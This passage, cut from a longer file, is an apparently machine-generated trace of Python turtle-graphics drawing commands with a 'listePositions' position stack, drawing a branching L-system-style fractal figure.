right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((161.52,171.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((161.52,171.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((161.52,171.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((161.52,171.50)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((172.83,182.81), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((172.83,182.81)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((172.83,182.81), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((172.83,182.81)), setheading(45.0) ;
pu(), setposition((130.74,165.38)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((136.86,180.16), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.86,180.16)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((136.86,180.16), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.86,180.16)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((148.18,191.47), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.18,191.47)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((148.18,191.47), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.18,191.47)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((162.96,197.59), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.96,197.59)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((162.96,197.59), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.96,197.59)), setheading(22.5) ;
pu(), setposition((130.74,165.38)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((142.05,176.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((142.05,176.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((142.05,176.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((142.05,176.69)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.37,188.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.37,188.00)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((169.37,188.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.37,188.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((169.37,188.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.37,188.00)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((184.15,194.13), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.15,194.13)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((184.15,194.13), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.15,194.13)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((195.46,205.44), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.46,205.44)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((195.46,205.44), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.46,205.44)), setheading(45.0) ;
pu(), setposition((153.37,188.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((159.49,202.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((159.49,202.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((170.80,214.10), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((170.80,214.10)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((170.80,214.10), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((170.80,214.10)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((185.59,220.22), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.59,220.22)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((185.59,220.22), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.59,220.22)), setheading(22.5) ;
pu(), setposition((153.37,188.00)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((169.37,188.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.37,188.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((169.37,188.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.37,188.00)), setheading(0.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.37,188.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.37,188.00)), setheading(0.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((196.68,176.69), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.68,176.69)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((196.68,176.69), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.68,176.69)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((211.46,170.57), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.46,170.57)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((211.46,170.57), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.46,170.57)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((227.46,170.57), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((227.46,170.57)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((227.46,170.57), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((227.46,170.57)), setheading(0.0) ;
pu(), setposition((185.37,188.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((200.15,194.13), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.15,194.13)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((200.15,194.13), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.15,194.13)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((216.15,194.13), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((216.15,194.13)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((216.15,194.13), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((216.15,194.13)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((230.93,188.00), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.93,188.00)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((230.93,188.00), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.93,188.00)), setheading(337.5) ;
pu(), setposition((185.37,188.00)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((200.15,194.13), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.15,194.13)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((200.15,194.13), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.15,194.13)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((214.93,200.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((214.93,200.25)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((229.71,194.13), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((229.71,194.13)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((229.71,194.13), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((229.71,194.13)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((245.71,194.13), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((245.71,194.13)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((245.71,194.13), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((245.71,194.13)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((260.49,200.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((260.49,200.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((260.49,200.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((260.49,200.25)), setheading(22.5) ;
pu(), setposition((214.93,200.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((226.24,211.56), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((226.24,211.56)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((226.24,211.56), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((226.24,211.56)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((241.03,217.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((241.03,217.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((241.03,217.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((241.03,217.69)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((257.03,217.69), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((257.03,217.69)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((257.03,217.69), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((257.03,217.69)), setheading(0.0) ;
pu(), setposition((214.93,200.25)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((226.24,211.56), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((226.24,211.56)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((226.24,211.56), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((226.24,211.56)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((237.56,222.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((237.56,222.88)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((253.56,222.88), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((253.56,222.88)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((253.56,222.88), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((253.56,222.88)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((268.34,229.00), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((268.34,229.00)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((268.34,229.00), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((268.34,229.00)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((279.65,240.31), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((279.65,240.31)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((279.65,240.31), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((279.65,240.31)), setheading(45.0) ;
pu(), setposition((237.56,222.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((243.68,237.66), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.68,237.66)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((243.68,237.66), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.68,237.66)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((254.99,248.97), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((254.99,248.97)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((254.99,248.97), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((254.99,248.97)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((269.78,255.10), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((269.78,255.10)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((269.78,255.10), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((269.78,255.10)), setheading(22.5) ;
pu(), setposition((237.56,222.88)), setheading(45.0) ;
pu(), setposition((153.37,188.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((159.49,202.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((159.49,202.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0)] ;
right(22.5) ;
